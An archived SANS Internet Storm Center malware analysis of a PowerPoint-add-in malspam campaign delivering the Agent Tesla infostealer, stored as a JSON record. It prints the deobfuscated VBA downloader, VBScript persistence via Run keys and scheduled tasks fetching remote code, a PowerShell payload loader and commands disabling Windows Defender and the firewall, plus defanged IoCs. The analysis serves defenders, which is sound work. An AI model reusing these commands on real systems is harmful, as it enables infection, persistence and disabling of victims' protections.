{
	"id": "591b28b9-ff82-4aff-8bb4-929c312e312e",
	"created_at": "2026-04-06T00:17:17.361394Z",
	"updated_at": "2026-04-10T03:20:32.757403Z",
	"deleted_at": null,
	"sha1_hash": "c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e",
	"title": "PowerPoint attachments, Agent Tesla and code reuse in malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 697969,
	"plain_text": "PowerPoint attachments, Agent Tesla and code reuse in malware\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 12:58:15 UTC\r\nSince any Office document that may contains macros can potentially be used by malware authors with similar\r\nresult as the usual Excel spreadsheet with macros, threat actors have most probably utilized all of the available\r\nmacro-enabled Office formats for attacks at some point. However, since most users would probably view\r\nPowerPoint slideshow asking them to enable macros with a not insignificant level suspicion, most attackers tend\r\nnot to use any of PowerPoint file formats at all.\r\nOver the past few months, I have nevertheless noticed an unusual increase in the number of malicious PowerPoint\r\nattachments caught in my (mal)spam trap. Although the use of malicious PowerPoint is nothing new[1], given the\r\nreasons mentioned above, it has never been too common, so I thought it might be worthwhile to take a look at an\r\nexample of a recent malspam campaign that spread the Agent Tesla infostealer using a macro-enabled PowerPoint\r\nfile.\r\nThe file in question was named SKM-03753WIRE23560USD.ppam and was distributed as an attachment of an e-mail that tried to make it appear as a wire transfer receipt.\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 1 of 10\n\nYou may have noticed that the filename ended in an unusual extension PPAM. This extension is used for\r\nPowerPoint Add-ins with macros[2], a special format for extending functionalities of PowerPoint presentations.\r\nAlthough there are some differences in content between PPAM and the more usual PPTM files, these don’t\r\nconcern macros. Therefore, if we only care about the embedded VBA code, as in this instance, we may analyze a\r\nPPAM using oledump[3], or any other tool we would normally use to parse macro-enabled Office documents.\r\nIn this instance, the file turned out to contain only one small, slightly obfuscated VBA script:\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 2 of 10\n\nSub Auto_Open()\r\nSet Outlook = CreateObject(yOCaKOVzT(\"V|{svvr5Hwwspjh{pvu\", \"7\"))\r\nSet Microsoft = Outlook.CreateObject(yOCaKOVzT(\"^zjypw{5Zolss\", \"7\"))\r\nSet MicrosoftExec = Microsoft.Exec(yOCaKOVzT(\"rqygt\", \"2\") + yOCaKOVzT(\"ynkrr4k~k\u0026\", \"6\") + Chr(150) + yOCaKOVzT\r\nMsgBox (MicrosoftExec.StdOut.ReadAll)\r\nEnd Sub\r\nPublic Function yOCaKOVzT(dghKkkXkS As String, NdffEcveP As Integer)\r\n Dim Pp6IFCPL9 As Integer\r\n For Pp6IFCPL9 = 1 To Len(dghKkkXkS)\r\nDim tHvckljoMTaERQgkne As Boolean\r\n Mid(dghKkkXkS, Pp6IFCPL9, 1) = Chr(Asc(Mid(dghKkkXkS, Pp6IFCPL9, 1)) - NdffEcveP)\r\n Next Pp6IFCPL9\r\nDim TMydgBdhyraoOOowKm As Byte\r\n yOCaKOVzT = dghKkkXkS\r\nEnd Function\r\nSince the function yOCaKOVzT only subtracts the value provided in the second argument from each byte in the\r\nstring provided as the first argument, deobfuscation of the script is fairly straightforward and leads to the\r\nfollowing code.\r\nSub Auto_Open()\r\nSet Outlook = CreateObject(\"Outlook.Application\")\r\nSet Microsoft = Outlook.CreateObject(\"Microsoft = Wscript.Shell\")\r\nSet MicrosoftExec = Microsoft.Exec(\"MicrosoftExec = powershell.exe -WindowStyle Hidden -c c:\\windows\\sy\r\nMsgBox (MicrosoftExec.StdOut.ReadAll)\r\nEnd Sub\r\nAs we may see, the VBA script is a simple downloader, that is supposed execute PowerShell code, which will\r\ngrab a file from hxxps:j[.]mp/chrehghghghghghghghghghcre (which redirects to\r\nhxxps://download2389.mediafire[.]com/ya9tv6zqa1zg/95ggilwnqccbq6l/20.doc) and execute it using the\r\nMicrosoft HTML Application host (MSHTA).\r\nAfter cleaning the downloaded file 20.doc up a bit, it came down to the following VBScript:\r\npink = \"pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('hxxps://8db3b91a-ea93-419b-b51b-0\r\ni'E'x(iwr('hxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_92ec48660f134f3bb502662383ca4f\r\nConst tpok = \u0026H80000001\r\nlopaskkk = \".\"\r\nSet kasodkmwm = GetObject(\"winmgmts:\\\\\" \u0026 lopaskkk \u0026 \"\\root\\default:StdRegProv\")\r\npoloaosd = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 3 of 10\n\nakosdwdjdw = \"cjjhkloggw\"\r\nkasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink\r\nset MicrosoftWINdows = GetObject(StrReverse(\"B0A85DF40C00-9BDA-0D11-0FC1-22CD539F:wen\"))\r\nMicrosoftWINdows _\r\n. _\r\nRUn _\r\npink,0\r\nargs = \"/create /sc MINUTE /mo 63 /tn \"\"\"\"kbnvmmmhjo\"\"\"\" /\" \u0026 _\r\n\"F /tr \"\"\"\"\\\"\"\"\"M\" \u0026 \"s\" \u0026 \"H\" \u0026 \"t\" \u0026 \"A\"\"\"\"\\\"\"\"\"hxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.htm\r\nhxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.html\r\n[code omitted]\r\nmagolia = \".\"\r\nSet Pologachi = GetObject(\"winmgmts:\\\\\" \u0026 magolia \u0026 \"\\root\\default:StdRegProv\")\r\nthreefifty = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nMagachuchugaga = \"pilodkis\"\r\npathanogalulu = calc \"\"\"hxxp://www.starinxxxgkular.duckdns[.]org/s1/20.txt\"\"\"\r\nPologachi.SetStringValue halaluya, threefifty, Magachuchugaga, pathanogalulu\r\n[code omitted]\r\nGoing down from the top, the script it is supposed to:\r\n1. Download and execute two files containing PowerShell script from usrfiles.com (we’ll look at those in a\r\nmoment).\r\n2. Ensure persistence using the registry Run key by creating a value containing the same PowerShell script as\r\nwe mention in 1. It also created another value in the same key, which was supposed to run a file from\r\nhttp[:]//www.starinxxxgkular.duckdns[.]org using MSHTA (although the link was already dead at the time\r\nof the analysis , it may be reasonable assumed that this was supposed to be additional persistence\r\nmechanism).\r\n3. Ensure persistence using Scheduled Task named kbnvmmmhjo, which was supposed to run a file using\r\nMSHTA from hxxps:// kdaoskdokaodkwldld.blogspot[.]com.\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 4 of 10\n\nThe first PowerShell script mentioned above was lightly obfuscated and contained what we may think of as the\r\n“main payload” – two GunZipped PE files in separate byte arrays (an “injector” and the actual Agent Tesla\r\nexecutable) and the code to decompress them and use the “injector” in the second byte array to execute the main\r\nAgent Tesla file. The following code is a portion of its deobfuscated content:\r\n[byte[]] $byteArray1 = @(31,139,...,94,3,0)\r\n[byte[]] $byteArray2 =@(31,139,...,228,0,0)\r\n[byte[]] $decompressedArray1 = Get-DecompressedByteArray $byteArray1\r\n[byte[]] $decompressedArray2 = Get-DecompressedByteArray $byteArray2\r\n[Reflection.Assembly]::Load($decompressedArray2).GetType('projFUD.PA').GetMethod('Execute').Invoke($null,[object\r\nBoth of the executables were written in .NET (as is usual for Agent Tesla) and both were fairly heavily obfuscated,\r\nas you may see from the following images.\r\nInjector code – the Execute method\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 5 of 10\n\nExcerpt from the list of methods in the Agent Tesla executable\r\nNevertheless, with a little bit of deobfuscation, it is possible to see that the injector is supposed to inject the Agent\r\nTesla code into the hollowed out aspnet_compiler.exe process (a technique which Agent Tesla has been known to\r\nuse[4]). And even without understanding the names of methods and variables in the main Agent Tesla code, some\r\nportions of it are fairly clear, such as the following excerpt from the key-logging method.\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 6 of 10\n\nThe last file we didn’t take a closer look at was the second PowerShell script downloaded by the second stage of\r\nthe infection chain.\r\n$down = New-Object System.Net.WebClient\r\n$url = 'hxxps://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe';\r\n$file = 'C:\\Users\\Public\\NSudo.exe';\r\n$down.DownloadFile($url,$file);\r\n$kasodkaosd = New-Object System.Net.WebClient\r\n$kasodkaosdsdmaowdk = 'hxxps://www.mediafire[.]com/file/qh5j3uy8qo8cpu7/FINAL+MAIN+vbs+-+Copy.vbs/file';\r\n$kasdjwkdo = 'C:\\Users\\Public\\heheheheh.vbs';\r\n$kasodkaosd.DownloadFile($kasodkaosdsdmaowdk,$kasdjwkdo);\r\nFunction script:Set-INFFile {\r\n[CmdletBinding()]\r\nParam (\r\n[Parameter(HelpMessage=\"Specify the INF file location\")]\r\n$InfFileLocation = \"$env:temp\\CMSTP.inf\",\r\n[Parameter(HelpMessage=\"Specify the command to launch in a UAC-privileged window\")]\r\n[String]$CommandToExecute = 'wscript.exe C:\\Users\\Public\\heheheheh.vbs'\r\n)\r\n [code omitted]\r\nSince this script is only slightly obfuscated, we may clearly see that it is supposed to download NSudo[5] (a\r\nprivilege escalation utility) and a VBS file hosted on mediafire.com, which it it then supposed to execute using\r\nWScript.\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 7 of 10\n\nThis final VBS is not obfuscated at all, and it can be clearly seen that it is basically supposed to disable the anti-malware protection with (among other techniques) the use of the NSudo tool which was previously downloaded.\r\n[code omitted]\r\nSet objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"C:\\Users\\Public\\NSudo.exe -U:T -ShowWindowMode:Hide sc delete windefend\"\r\n[code omitted]\r\noutputMessage(\"Add-MpPreference -ExclusionProcess powershell.exe\")\r\noutputMessage(\"Add-MpPreference -ExclusionProcess mshta.exe\")\r\noutputMessage(\"Add-MpPreference -ExclusionProcess cmd.exe\")\r\noutputMessage(\"Add-MpPreference -ExclusionProcess wscript.exe\")\r\noutputMessage(\"Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRea\r\n[code omitted]\r\noutputMessage(\"netsh advfirewall set allprofiles state off\")\r\noutputMessage(\"Stop-Service -Name WinDefend -Confirm:$false -Force\")\r\noutputMessage(\"Set-Service -Name WinDefend -StartupType Disabled\")\r\noutputMessage(\"sc delete windefend\")\r\nSub outputMessage(byval args)\r\n[code omitted]\r\nerrReturn = objProcess.Create( \"powershell \" + args, null, objConfig, intProcessID)\r\nEnd Sub\r\nAs we may see from the following diagram, the very simple macro, which was contained in the PPAM file, lead to\r\na fairly complex infection chain in the end…\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 8 of 10\n\nThis is not the end of the story, however, since one additional point which deserves a small mention is the reuse of\r\nopen-source code in the infection chain.\r\nAlthough reuse of code from GitHub or StackOverflow is ubiquitous among both legitimate developers and\r\nmalware authors alike, in this case, unmodified “borrowed” code was used quite heavily. For example, the GunZip\r\nalgorithm used by the third (PowerShell) stage was taken from GitHub, as was a UAC bypass used to execute the\r\nfinal VBS script[6]. Since in both of these instances, the foreign code made up a significant portion of the\r\nanalyzed file, not having to examine it too deeply sped up the entire analysis greatly.\r\nTherefore, I will offer one parting advice which can be useful especially to any junior security analysts out there.\r\nIf you ever see a line in a malicious code, which doesn’t seem to belong there (e.g., a call to a function which is\r\nsupposed to display a visible error message to the user) try to ask Google whether it hadn’t seen it somewhere\r\nelse. In some cases, you will come up empty, as such code might have been included on purpose by the malware\r\nauthor in an attempt to obfuscate the real functionality of the program, however, in other instances you may find\r\nthat a significant portion of the code in front of you has been reused, and you might not have to spend time on\r\ngoing into it any deeper than just to gather the basic understanding of its main function.\r\nIndicators of Compromise (IoCs)\r\nURLs\r\nhxxps://j[.]mp/chrehghghghghghghghghghcre\r\nhxxps://download2389.mediafire[.]com/ya9tv6zqa1zg/95ggilwnqccbq6l/20.doc\r\nhxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_2e35a24e3e7b4efba4867a06c6271f32.txt\r\nhxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_92ec48660f134f3bb502662383ca4ffb.txt\r\nhxxp://www.starinxxxgkular.duckdns[.]org/s1/20.txt\r\nhxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.html\r\nhxxps://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe\r\nhxxps://www.mediafire[.]com/file/qh5j3uy8qo8cpu7/FINAL+MAIN+vbs+-+Copy.vbs/file\r\nFiles\r\n20.doc\r\nMD5 - 425244233f21dac6f4395ab0c8c0c03e\r\nSHA1 - 003db538810e74ad74f33b2c69cfa85026e529fd\r\n8db3b9_2e35a24e3e7b4efba4867a06c6271f32.txt\r\nMD5 - cc60f4380686f2216bce3e8a287fc705\r\nSHA1 - 569eed2060bb0b669a7ae12f1e6c04649785bc11\r\n8db3b9_92ec48660f134f3bb502662383ca4ffb.txt\r\nMD5 - be208287362492a1a3703483fefa4d3b\r\nSHA1 - 3f834a4369f828aea46e44134afadbba8875ba05\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 9 of 10\n\nheheheheh.vbs\r\nMD5 - eacb8465cc5d6671618ea2b23986a45a\r\nSHA1 - 6d2e4dbfda127cda2478e68a5426f9646bba10c5\r\n[1] https://blog.nviso.eu/2017/06/07/malicious-powerpoint-documents-abusing-mouse-over-actions/\r\n[2] https://fileinfo.com/extension/ppam\r\n[3] https://blog.didierstevens.com/programs/oledump-py/ \r\n[4] https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\r\n[5] https://github.com/m2team/NSudo\r\n[6] https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1\r\n-----------\r\nJan Kopriva\r\n@jk0pr\r\nAlef Nula\r\nSource: https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/"
	],
	"report_names": [
		"28154"
	],
	"threat_actors": [],
	"ts_created_at": 1775434637,
	"ts_updated_at": 1775791232,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e.pdf",
		"text": "https://archive.orkl.eu/c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e.txt",
		"img": "https://archive.orkl.eu/c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e.jpg"
	}
}